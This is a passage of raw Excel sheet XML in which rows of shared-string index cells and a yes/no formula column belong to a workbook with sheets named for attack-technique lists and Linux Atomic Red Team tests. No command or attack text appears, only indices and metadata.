      <c r="C16" s="9" t="s">
        <v>375</v>
      </c>
      <c r="D16" t="str">
        <f t="shared" si="0"/>
        <v>no</v>
      </c>
    </row>
    <row r="17" spans="1:4" ht="47.25" x14ac:dyDescent="0.25">
      <c r="A17" s="9" t="s">
        <v>3021</v>
      </c>
      <c r="B17" s="9" t="s">
        <v>545</v>
      </c>
      <c r="C17" s="9" t="s">
        <v>375</v>
      </c>
      <c r="D17" t="str">
        <f t="shared" si="0"/>
        <v>no</v>
      </c>
    </row>
    <row r="18" spans="1:4" ht="78.75" x14ac:dyDescent="0.25">
      <c r="A18" s="9" t="s">
        <v>3022</v>
      </c>
      <c r="B18" s="9" t="s">
        <v>561</v>
      </c>
      <c r="C18" s="9" t="s">
        <v>375</v>
      </c>
      <c r="D18" t="str">
        <f t="shared" si="0"/>
        <v>no</v>
      </c>
    </row>
    <row r="19" spans="1:4" ht="47.25" x14ac:dyDescent="0.25">
      <c r="A19" s="9" t="s">
        <v>3023</v>
      </c>
      <c r="B19" s="9" t="s">
        <v>582</v>
      </c>
      <c r="C19" s="9" t="s">
        <v>375</v>
      </c>
      <c r="D19" t="str">
        <f t="shared" si="0"/>
        <v>no</v>
      </c>
    </row>
    <row r="20" spans="1:4" ht="47.25" x14ac:dyDescent="0.25">
      <c r="A20" s="9" t="s">
        <v>3024</v>
      </c>
      <c r="B20" s="9" t="s">
        <v>592</v>
      </c>
      <c r="C20" s="9" t="s">
        <v>375</v>
      </c>
      <c r="D20" t="str">
        <f t="shared" si="0"/>
        <v>no</v>
      </c>
    </row>
    <row r="21" spans="1:4" ht="47.25" x14ac:dyDescent="0.25">
      <c r="A21" s="9" t="s">
        <v>3025</v>
      </c>
      <c r="B21" s="9" t="s">
        <v>596</v>
      </c>
      <c r="C21" s="9" t="s">
        <v>375</v>
      </c>
      <c r="D21" t="str">
        <f t="shared" si="0"/>
        <v>no</v>
      </c>
    </row>
    <row r="22" spans="1:4" ht="63" x14ac:dyDescent="0.25">
      <c r="A22" s="9" t="s">
        <v>3026</v>
      </c>
      <c r="B22" s="9" t="s">
        <v>600</v>
      </c>
      <c r="C22" s="9" t="s">
        <v>375</v>
      </c>
      <c r="D22" t="str">
        <f t="shared" si="0"/>
        <v>no</v>
      </c>
    </row>
    <row r="23" spans="1:4" ht="63" x14ac:dyDescent="0.25">
      <c r="A23" s="9" t="s">
        <v>3027</v>
      </c>
      <c r="B23" s="9" t="s">
        <v>604</v>
      </c>
      <c r="C23" s="9" t="s">
        <v>375</v>
      </c>
      <c r="D23" t="str">
        <f t="shared" si="0"/>
        <v>no</v>
      </c>
    </row>
    <row r="24" spans="1:4" ht="63" x14ac:dyDescent="0.25">
      <c r="A24" s="9" t="s">
        <v>3028</v>
      </c>
      <c r="B24" s="9" t="s">
        <v>609</v>
      </c>
      <c r="C24" s="9" t="s">
        <v>375</v>
      </c>
      <c r="D24" t="str">
        <f t="shared" si="0"/>
        <v>no</v>
      </c>
    </row>
    <row r="25" spans="1:4" ht="47.25" x14ac:dyDescent="0.25">
      <c r="A25" s="9" t="s">
        <v>3029</v>
      </c>
      <c r="B25" s="9" t="s">
        <v>616</v>
      </c>
      <c r="C25" s="9" t="s">
        <v>375</v>
      </c>
      <c r="D25" t="str">
        <f t="shared" si="0"/>
        <v>no</v>
      </c>
    </row>
    <row r="26" spans="1:4" ht="78.75" x14ac:dyDescent="0.25">
      <c r="A26" s="9" t="s">
        <v>3030</v>
      </c>
      <c r="B26" s="9" t="s">
        <v>623</v>
      </c>
      <c r="C26" s="9" t="s">
        <v>375</v>
      </c>
      <c r="D26" t="str">
        <f t="shared" si="0"/>
        <v>no</v>
      </c>
    </row>
    <row r="27" spans="1:4" ht="47.25" x14ac:dyDescent="0.25">
      <c r="A27" s="9" t="s">
        <v>3031</v>
      </c>
      <c r="B27" s="9" t="s">
        <v>629</v>
      </c>
      <c r="C27" s="9" t="s">
        <v>375</v>
      </c>
      <c r="D27" t="str">
        <f t="shared" si="0"/>
        <v>no</v>
      </c>
    </row>
    <row r="28" spans="1:4" ht="78.75" x14ac:dyDescent="0.25">
      <c r="A28" s="9" t="s">
        <v>3032</v>
      </c>
      <c r="B28" s="9" t="s">
        <v>637</v>
      </c>
      <c r="C28" s="9" t="s">
        <v>375</v>
      </c>
      <c r="D28" t="str">
        <f t="shared" si="0"/>
        <v>no</v>
      </c>
    </row>
    <row r="29" spans="1:4" ht="47.25" x14ac:dyDescent="0.25">
      <c r="A29" s="9" t="s">
        <v>3033</v>
      </c>
      <c r="B29" s="9" t="s">
        <v>640</v>
      </c>
      <c r="C29" s="9" t="s">
        <v>375</v>
      </c>
      <c r="D29" t="str">
        <f t="shared" si="0"/>
        <v>no</v>
      </c>
    </row>
    <row r="30" spans="1:4" ht="94.5" x14ac:dyDescent="0.25">
      <c r="A30" s="9" t="s">
        <v>3034</v>
      </c>
      <c r="B30" s="9" t="s">
        <v>821</v>
      </c>
      <c r="C30" s="9" t="s">
        <v>820</v>
      </c>
      <c r="D30" t="str">
        <f t="shared" si="0"/>
        <v>no</v>
      </c>
    </row>
    <row r="31" spans="1:4" ht="31.5" x14ac:dyDescent="0.25">
      <c r="A31" s="9" t="s">
        <v>3036</v>
      </c>
      <c r="B31" s="9" t="s">
        <v>900</v>
      </c>
      <c r="C31" s="9" t="s">
        <v>892</v>
      </c>
      <c r="D31" t="str">
        <f t="shared" si="0"/>
        <v>no</v>
      </c>
    </row>
    <row r="32" spans="1:4" ht="31.5" x14ac:dyDescent="0.25">
      <c r="A32" s="9" t="s">
        <v>3040</v>
      </c>
      <c r="B32" s="9" t="s">
        <v>958</v>
      </c>
      <c r="C32" s="9" t="s">
        <v>892</v>
      </c>
      <c r="D32" t="str">
        <f t="shared" si="0"/>
        <v>no</v>
      </c>
    </row>
    <row r="33" spans="1:4" ht="31.5" x14ac:dyDescent="0.25">
      <c r="A33" s="9" t="s">
        <v>3041</v>
      </c>
      <c r="B33" s="9" t="s">
        <v>988</v>
      </c>
      <c r="C33" s="9" t="s">
        <v>892</v>
      </c>
      <c r="D33" t="str">
        <f t="shared" si="0"/>
        <v>no</v>
      </c>
    </row>
    <row r="34" spans="1:4" ht="31.5" x14ac:dyDescent="0.25">
      <c r="A34" s="9" t="s">
        <v>3044</v>
      </c>
      <c r="B34" s="9" t="s">
        <v>1010</v>
      </c>
      <c r="C34" s="9" t="s">
        <v>892</v>
      </c>
      <c r="D34" t="str">
        <f t="shared" ref="D34:D65" si="1">IF(LEN(E34)&gt;0,"yes","no")</f>
        <v>no</v>
      </c>
    </row>
    <row r="35" spans="1:4" ht="31.5" x14ac:dyDescent="0.25">
      <c r="A35" s="9" t="s">
        <v>3046</v>
      </c>
      <c r="B35" s="9" t="s">
        <v>1025</v>
      </c>
      <c r="C35" s="9" t="s">
        <v>892</v>
      </c>
      <c r="D35" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
    </row>
    <row r="36" spans="1:4" ht="94.5" x14ac:dyDescent="0.25">
      <c r="A36" s="9" t="s">
        <v>3048</v>
      </c>
      <c r="B36" s="9" t="s">
        <v>1047</v>
      </c>
      <c r="C36" s="9" t="s">
        <v>892</v>
      </c>
      <c r="D36" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
    </row>
    <row r="37" spans="1:4" ht="157.5" x14ac:dyDescent="0.25">
      <c r="A37" s="9" t="s">
        <v>3049</v>
      </c>
      <c r="B37" s="9" t="s">
        <v>1059</v>
      </c>
      <c r="C37" s="9" t="s">
        <v>1058</v>
      </c>
      <c r="D37" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
    </row>
    <row r="38" spans="1:4" ht="31.5" x14ac:dyDescent="0.25">
      <c r="A38" s="9" t="s">
        <v>3051</v>
      </c>
      <c r="B38" s="9" t="s">
        <v>1089</v>
      </c>
      <c r="C38" s="9" t="s">
        <v>1088</v>
      </c>
      <c r="D38" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
    </row>
    <row r="39" spans="1:4" ht="47.25" x14ac:dyDescent="0.25">
      <c r="A39" s="9" t="s">
        <v>3052</v>
      </c>
      <c r="B39" s="9" t="s">
        <v>1100</v>
      </c>
      <c r="C39" s="9" t="s">
        <v>1088</v>
      </c>
      <c r="D39" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
    </row>
    <row r="40" spans="1:4" ht="31.5" x14ac:dyDescent="0.25">
      <c r="A40" s="9" t="s">
        <v>3054</v>
      </c>
      <c r="B40" s="9" t="s">
        <v>1136</v>
      </c>
      <c r="C40" s="9" t="s">
        <v>1088</v>
      </c>
      <c r="D40" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
    </row>
    <row r="41" spans="1:4" ht="63" x14ac:dyDescent="0.25">
      <c r="A41" s="9" t="s">
        <v>3055</v>
      </c>
      <c r="B41" s="9" t="s">
        <v>1154</v>
      </c>
      <c r="C41" s="9" t="s">
        <v>1088</v>
      </c>
      <c r="D41" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
    </row>
    <row r="42" spans="1:4" ht="31.5" x14ac:dyDescent="0.25">
      <c r="A42" s="9" t="s">
        <v>3057</v>
      </c>
      <c r="B42" s="9" t="s">
        <v>1186</v>
      </c>
      <c r="C42" s="9" t="s">
        <v>1088</v>
      </c>
      <c r="D42" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
    </row>
    <row r="43" spans="1:4" ht="47.25" x14ac:dyDescent="0.25">
      <c r="A43" s="9" t="s">
        <v>3058</v>
      </c>
      <c r="B43" s="9" t="s">
        <v>1195</v>
      </c>
      <c r="C43" s="9" t="s">
        <v>1088</v>
      </c>
      <c r="D43" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
    </row>
    <row r="44" spans="1:4" ht="31.5" x14ac:dyDescent="0.25">
      <c r="A44" s="9" t="s">
        <v>3060</v>
      </c>
      <c r="B44" s="9" t="s">
        <v>1220</v>
      </c>
      <c r="C44" s="9" t="s">
        <v>1088</v>
      </c>
      <c r="D44" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
    </row>
    <row r="45" spans="1:4" ht="78.75" x14ac:dyDescent="0.25">
      <c r="A45" s="9" t="s">
        <v>3061</v>
      </c>
      <c r="B45" s="9" t="s">
        <v>1269</v>
      </c>
      <c r="C45" s="9" t="s">
        <v>1088</v>
      </c>
      <c r="D45" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
    </row>
    <row r="46" spans="1:4" ht="31.5" x14ac:dyDescent="0.25">
      <c r="A46" s="9" t="s">
        <v>3064</v>
      </c>
      <c r="B46" s="9" t="s">
        <v>1317</v>
      </c>
      <c r="C46" s="9" t="s">
        <v>1088</v>
      </c>
      <c r="D46" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
    </row>
    <row r="47" spans="1:4" ht="63" x14ac:dyDescent="0.25">
      <c r="A47" s="9" t="s">
        <v>3071</v>
      </c>
      <c r="B47" s="9" t="s">
        <v>1403</v>
      </c>
      <c r="C47" s="9" t="s">
        <v>1088</v>
      </c>
      <c r="D47" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
    </row>
    <row r="48" spans="1:4" ht="47.25" x14ac:dyDescent="0.25">
      <c r="A48" s="9" t="s">
        <v>3073</v>
      </c>
      <c r="B48" s="9" t="s">
        <v>1418</v>
      </c>
      <c r="C48" s="9" t="s">
        <v>1088</v>
      </c>
      <c r="D48" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
    </row>
    <row r="49" spans="1:4" ht="31.5" x14ac:dyDescent="0.25">
      <c r="A49" s="9" t="s">
        <v>3077</v>
      </c>
      <c r="B49" s="9" t="s">
        <v>1462</v>
      </c>
      <c r="C49" s="9" t="s">
        <v>1088</v>
      </c>
      <c r="D49" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
    </row>
    <row r="50" spans="1:4" ht="47.25" x14ac:dyDescent="0.25">
      <c r="A50" s="9" t="s">
        <v>3079</v>
      </c>
      <c r="B50" s="9" t="s">
        <v>1511</v>
      </c>
      <c r="C50" s="9" t="s">
        <v>1501</v>
      </c>
      <c r="D50" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
    </row>
    <row r="51" spans="1:4" ht="47.25" x14ac:dyDescent="0.25">
      <c r="A51" s="9" t="s">
        <v>3080</v>
      </c>
      <c r="B51" s="9" t="s">
        <v>1522</v>
      </c>
      <c r="C51" s="9" t="s">
        <v>1501</v>
      </c>
      <c r="D51" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
    </row>
    <row r="52" spans="1:4" ht="63" x14ac:dyDescent="0.25">
      <c r="A52" s="9" t="s">
        <v>3088</v>
      </c>
      <c r="B52" s="9" t="s">
        <v>1612</v>
      </c>
      <c r="C52" s="9" t="s">
        <v>1602</v>
      </c>
      <c r="D52" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
    </row>
    <row r="53" spans="1:4" ht="63" x14ac:dyDescent="0.25">
      <c r="A53" s="9" t="s">
        <v>3089</v>
      </c>
      <c r="B53" s="9" t="s">
        <v>1619</v>
      </c>
      <c r="C53" s="9" t="s">
        <v>1602</v>
      </c>
      <c r="D53" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
    </row>
    <row r="54" spans="1:4" ht="110.25" x14ac:dyDescent="0.25">
      <c r="A54" s="9" t="s">
        <v>3093</v>
      </c>
      <c r="B54" s="9" t="s">
        <v>1657</v>
      </c>
      <c r="C54" s="9" t="s">
        <v>1642</v>
      </c>
      <c r="D54" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
    </row>
    <row r="55" spans="1:4" ht="78.75" x14ac:dyDescent="0.25">
      <c r="A55" s="9" t="s">
        <v>3098</v>
      </c>
      <c r="B55" s="9" t="s">
        <v>1719</v>
      </c>
      <c r="C55" s="9" t="s">
        <v>1691</v>
      </c>
      <c r="D55" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
    </row>
    <row r="56" spans="1:4" ht="47.25" x14ac:dyDescent="0.25">
      <c r="A56" s="9" t="s">
        <v>3099</v>
      </c>
      <c r="B56" s="9" t="s">
        <v>1747</v>
      </c>
      <c r="C56" s="9" t="s">
        <v>1746</v>
      </c>
      <c r="D56" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
    </row>
    <row r="57" spans="1:4" ht="31.5" x14ac:dyDescent="0.25">
      <c r="A57" s="9" t="s">
        <v>3100</v>
      </c>
      <c r="B57" s="9" t="s">
        <v>1764</v>
      </c>
      <c r="C57" s="9" t="s">
        <v>1746</v>
      </c>
      <c r="D57" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
    </row>
    <row r="58" spans="1:4" ht="63" x14ac:dyDescent="0.25">
      <c r="A58" s="9" t="s">
        <v>3101</v>
      </c>
      <c r="B58" s="9" t="s">
        <v>1779</v>
      </c>
      <c r="C58" s="9" t="s">
        <v>1746</v>
      </c>
      <c r="D58" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
    </row>
    <row r="59" spans="1:4" ht="47.25" x14ac:dyDescent="0.25">
      <c r="A59" s="9" t="s">
        <v>3106</v>
      </c>
      <c r="B59" s="9" t="s">
        <v>1879</v>
      </c>
      <c r="C59" s="9" t="s">
        <v>1746</v>
      </c>
      <c r="D59" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
    </row>
    <row r="60" spans="1:4" ht="31.5" x14ac:dyDescent="0.25">
      <c r="A60" s="9" t="s">
        <v>3107</v>
      </c>
      <c r="B60" s="9" t="s">
        <v>1884</v>
      </c>
      <c r="C60" s="9" t="s">
        <v>1746</v>
      </c>
      <c r="D60" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
    </row>
    <row r="61" spans="1:4" ht="78.75" x14ac:dyDescent="0.25">
      <c r="A61" s="9" t="s">
        <v>3110</v>
      </c>
      <c r="B61" s="9" t="s">
        <v>1902</v>
      </c>
      <c r="C61" s="9" t="s">
        <v>1746</v>
      </c>
      <c r="D61" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
    </row>
    <row r="62" spans="1:4" ht="47.25" x14ac:dyDescent="0.25">
      <c r="A62" s="9" t="s">
        <v>3112</v>
      </c>
      <c r="B62" s="9" t="s">
        <v>1911</v>
      </c>
      <c r="C62" s="9" t="s">
        <v>1746</v>
      </c>
      <c r="D62" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
    </row>
    <row r="63" spans="1:4" ht="78.75" x14ac:dyDescent="0.25">
      <c r="A63" s="9" t="s">
        <v>3113</v>
      </c>
      <c r="B63" s="9" t="s">
        <v>1917</v>
      </c>
      <c r="C63" s="9" t="s">
        <v>1746</v>
      </c>
      <c r="D63" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
    </row>
    <row r="64" spans="1:4" ht="47.25" x14ac:dyDescent="0.25">
      <c r="A64" s="9" t="s">
        <v>3114</v>
      </c>
      <c r="B64" s="9" t="s">
        <v>1921</v>
      </c>
      <c r="C64" s="9" t="s">
        <v>1746</v>
      </c>
      <c r="D64" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
    </row>
    <row r="65" spans="1:4" ht="63" x14ac:dyDescent="0.25">
      <c r="A65" s="9" t="s">
        <v>3115</v>
      </c>
      <c r="B65" s="9" t="s">
        <v>1926</v>
      </c>
      <c r="C65" s="9" t="s">
        <v>1746</v>
      </c>
      <c r="D65" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
    </row>
    <row r="66" spans="1:4" ht="47.25" x14ac:dyDescent="0.25">
      <c r="A66" s="9" t="s">
        <v>3116</v>
      </c>
      <c r="B66" s="9" t="s">
        <v>2185</v>
      </c>
      <c r="C66" s="9" t="s">
        <v>2184</v>
      </c>
      <c r="D66" t="str">
        <f t="shared" ref="D66:D90" si="2">IF(LEN(E66)&gt;0,"yes","no")</f>
        <v>no</v>
      </c>
    </row>
    <row r="67" spans="1:4" x14ac:dyDescent="0.25">
      <c r="A67" s="9" t="s">
        <v>3118</v>
      </c>
      <c r="B67" s="9" t="s">
        <v>2246</v>
      </c>
      <c r="C67" s="9" t="s">
        <v>2184</v>
      </c>
      <c r="D67" t="str">
        <f t="shared" si="2"/>
        <v>no</v>
      </c>
    </row>
    <row r="68" spans="1:4" ht="47.25" x14ac:dyDescent="0.25">
      <c r="A68" s="9" t="s">
        <v>3123</v>
      </c>
      <c r="B68" s="9" t="s">
        <v>2287</v>
      </c>
      <c r="C68" s="9" t="s">
        <v>2184</v>
      </c>
      <c r="D68" t="str">
        <f t="shared" si="2"/>
        <v>no</v>
      </c>
    </row>
    <row r="69" spans="1:4" ht="63" x14ac:dyDescent="0.25">
      <c r="A69" s="9" t="s">
        <v>3125</v>
      </c>
      <c r="B69" s="9" t="s">
        <v>2354</v>
      </c>
      <c r="C69" s="9" t="s">
        <v>2353</v>
      </c>
      <c r="D69" t="str">
        <f t="shared" si="2"/>
        <v>no</v>
      </c>
    </row>
    <row r="70" spans="1:4" ht="47.25" x14ac:dyDescent="0.25">
      <c r="A70" s="9" t="s">
        <v>3129</v>
      </c>
      <c r="B70" s="9" t="s">
        <v>2383</v>
      </c>
      <c r="C70" s="9" t="s">
        <v>2376</v>
      </c>
      <c r="D70" t="str">
        <f t="shared" si="2"/>
        <v>no</v>
      </c>
    </row>
    <row r="71" spans="1:4" ht="47.25" x14ac:dyDescent="0.25">
      <c r="A71" s="9" t="s">
        <v>3131</v>
      </c>
      <c r="B71" s="9" t="s">
        <v>2425</v>
      </c>
      <c r="C71" s="9" t="s">
        <v>2424</v>
      </c>
      <c r="D71" t="str">
        <f t="shared" si="2"/>
        <v>no</v>
      </c>
    </row>
    <row r="72" spans="1:4" ht="63" x14ac:dyDescent="0.25">
      <c r="A72" s="9" t="s">
        <v>3132</v>
      </c>
      <c r="B72" s="9" t="s">
        <v>2430</v>
      </c>
      <c r="C72" s="9" t="s">
        <v>2424</v>
      </c>
      <c r="D72" t="str">
        <f t="shared" si="2"/>
        <v>no</v>
      </c>
    </row>
    <row r="73" spans="1:4" ht="94.5" x14ac:dyDescent="0.25">
      <c r="A73" s="9" t="s">
        <v>3133</v>
      </c>
      <c r="B73" s="9" t="s">
        <v>2440</v>
      </c>
      <c r="C73" s="9" t="s">
        <v>2424</v>
      </c>
      <c r="D73" t="str">
        <f t="shared" si="2"/>
        <v>no</v>
      </c>
    </row>
    <row r="74" spans="1:4" ht="63" x14ac:dyDescent="0.25">
      <c r="A74" s="9" t="s">
        <v>3134</v>
      </c>
      <c r="B74" s="9" t="s">
        <v>2448</v>
      </c>
      <c r="C74" s="9" t="s">
        <v>2424</v>
      </c>
      <c r="D74" t="str">
        <f t="shared" si="2"/>
        <v>no</v>
      </c>
    </row>
    <row r="75" spans="1:4" ht="63" x14ac:dyDescent="0.25">
      <c r="A75" s="9" t="s">
        <v>3135</v>
      </c>
      <c r="B75" s="9" t="s">
        <v>2455</v>
      </c>
      <c r="C75" s="9" t="s">
        <v>2424</v>
      </c>
      <c r="D75" t="str">
        <f t="shared" si="2"/>
        <v>no</v>
      </c>
    </row>
    <row r="76" spans="1:4" ht="31.5" x14ac:dyDescent="0.25">
      <c r="A76" s="9" t="s">
        <v>3136</v>
      </c>
      <c r="B76" s="9" t="s">
        <v>2466</v>
      </c>
      <c r="C76" s="9" t="s">
        <v>2424</v>
      </c>
      <c r="D76" t="str">
        <f t="shared" si="2"/>
        <v>no</v>
      </c>
    </row>
    <row r="77" spans="1:4" ht="63" x14ac:dyDescent="0.25">
      <c r="A77" s="9" t="s">
        <v>3137</v>
      </c>
      <c r="B77" s="9" t="s">
        <v>2471</v>
      </c>
      <c r="C77" s="9" t="s">
        <v>2424</v>
      </c>
      <c r="D77" t="str">
        <f t="shared" si="2"/>
        <v>no</v>
      </c>
    </row>
    <row r="78" spans="1:4" ht="78.75" x14ac:dyDescent="0.25">
      <c r="A78" s="9" t="s">
        <v>3138</v>
      </c>
      <c r="B78" s="9" t="s">
        <v>2478</v>
      </c>
      <c r="C78" s="9" t="s">
        <v>2424</v>
      </c>
      <c r="D78" t="str">
        <f t="shared" si="2"/>
        <v>no</v>
      </c>
    </row>
    <row r="79" spans="1:4" ht="47.25" x14ac:dyDescent="0.25">
      <c r="A79" s="9" t="s">
        <v>3139</v>
      </c>
      <c r="B79" s="9" t="s">
        <v>2494</v>
      </c>
      <c r="C79" s="9" t="s">
        <v>2424</v>
      </c>
      <c r="D79" t="str">
        <f t="shared" si="2"/>
        <v>no</v>
      </c>
    </row>
    <row r="80" spans="1:4" ht="47.25" x14ac:dyDescent="0.25">
      <c r="A80" s="9" t="s">
        <v>3145</v>
      </c>
      <c r="B80" s="9" t="s">
        <v>2577</v>
      </c>
      <c r="C80" s="9" t="s">
        <v>2526</v>
      </c>
      <c r="D80" t="str">
        <f t="shared" si="2"/>
        <v>no</v>
      </c>
    </row>
    <row r="81" spans="1:4" ht="78.75" x14ac:dyDescent="0.25">
      <c r="A81" s="9" t="s">
        <v>3146</v>
      </c>
      <c r="B81" s="9" t="s">
        <v>2583</v>
      </c>
      <c r="C81" s="9" t="s">
        <v>2526</v>
      </c>
      <c r="D81" t="str">
        <f t="shared" si="2"/>
        <v>no</v>
      </c>
    </row>
    <row r="82" spans="1:4" ht="47.25" x14ac:dyDescent="0.25">
      <c r="A82" s="9" t="s">
        <v>3148</v>
      </c>
      <c r="B82" s="9" t="s">
        <v>2611</v>
      </c>
      <c r="C82" s="9" t="s">
        <v>2526</v>
      </c>
      <c r="D82" t="str">
        <f t="shared" si="2"/>
        <v>no</v>
      </c>
    </row>
    <row r="83" spans="1:4" ht="31.5" x14ac:dyDescent="0.25">
      <c r="A83" s="9" t="s">
        <v>3156</v>
      </c>
      <c r="B83" s="9" t="s">
        <v>2687</v>
      </c>
      <c r="C83" s="9" t="s">
        <v>2661</v>
      </c>
      <c r="D83" t="str">
        <f t="shared" si="2"/>
        <v>no</v>
      </c>
    </row>
    <row r="84" spans="1:4" ht="31.5" x14ac:dyDescent="0.25">
      <c r="A84" s="9" t="s">
        <v>3159</v>
      </c>
      <c r="B84" s="9" t="s">
        <v>2705</v>
      </c>
      <c r="C84" s="9" t="s">
        <v>2661</v>
      </c>
      <c r="D84" t="str">
        <f t="shared" si="2"/>
        <v>no</v>
      </c>
    </row>
    <row r="85" spans="1:4" ht="31.5" x14ac:dyDescent="0.25">
      <c r="A85" s="9" t="s">
        <v>3162</v>
      </c>
      <c r="B85" s="9" t="s">
        <v>2722</v>
      </c>
      <c r="C85" s="9" t="s">
        <v>2661</v>
      </c>
      <c r="D85" t="str">
        <f t="shared" si="2"/>
        <v>no</v>
      </c>
    </row>
    <row r="86" spans="1:4" ht="47.25" x14ac:dyDescent="0.25">
      <c r="A86" s="9" t="s">
        <v>3172</v>
      </c>
      <c r="B86" s="9" t="s">
        <v>2783</v>
      </c>
      <c r="C86" s="9" t="s">
        <v>2661</v>
      </c>
      <c r="D86" t="str">
        <f t="shared" si="2"/>
        <v>no</v>
      </c>
    </row>
    <row r="87" spans="1:4" ht="47.25" x14ac:dyDescent="0.25">
      <c r="A87" s="9" t="s">
        <v>3174</v>
      </c>
      <c r="B87" s="9" t="s">
        <v>2865</v>
      </c>
      <c r="C87" s="9" t="s">
        <v>2864</v>
      </c>
      <c r="D87" t="str">
        <f t="shared" si="2"/>
        <v>no</v>
      </c>
    </row>
    <row r="88" spans="1:4" ht="78.75" x14ac:dyDescent="0.25">
      <c r="A88" s="9" t="s">
        <v>3185</v>
      </c>
      <c r="B88" s="9" t="s">
        <v>2945</v>
      </c>
      <c r="C88" s="9" t="s">
        <v>2871</v>
      </c>
      <c r="D88" t="str">
        <f t="shared" si="2"/>
        <v>no</v>
      </c>
    </row>
    <row r="89" spans="1:4" ht="47.25" x14ac:dyDescent="0.25">
      <c r="A89" s="9" t="s">
        <v>3189</v>
      </c>
      <c r="B89" s="9" t="s">
        <v>2992</v>
      </c>
      <c r="C89" s="9" t="s">
        <v>2985</v>
      </c>
      <c r="D89" t="str">
        <f t="shared" si="2"/>
        <v>no</v>
      </c>
    </row>
    <row r="90" spans="1:4" ht="47.25" x14ac:dyDescent="0.25">
      <c r="A90" s="9" t="s">
        <v>3190</v>
      </c>
      <c r="B90" s="9" t="s">
        <v>2997</v>
      </c>
      <c r="C90" s="9" t="s">
        <v>2985</v>
      </c>
      <c r="D90" t="str">
        <f t="shared" si="2"/>
        <v>no</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ATTACK_ALL</vt:lpstr>
      <vt:lpstr>Groups</vt:lpstr>
      <vt:lpstr>ATTACK-dedupe</vt:lpstr>
      <vt:lpstr>Linux Atomic Red Tests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2018-02-18T16:28:16Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-02-19T15:18:03Z</dcterms:modified>
</cp:coreProperties>
</file>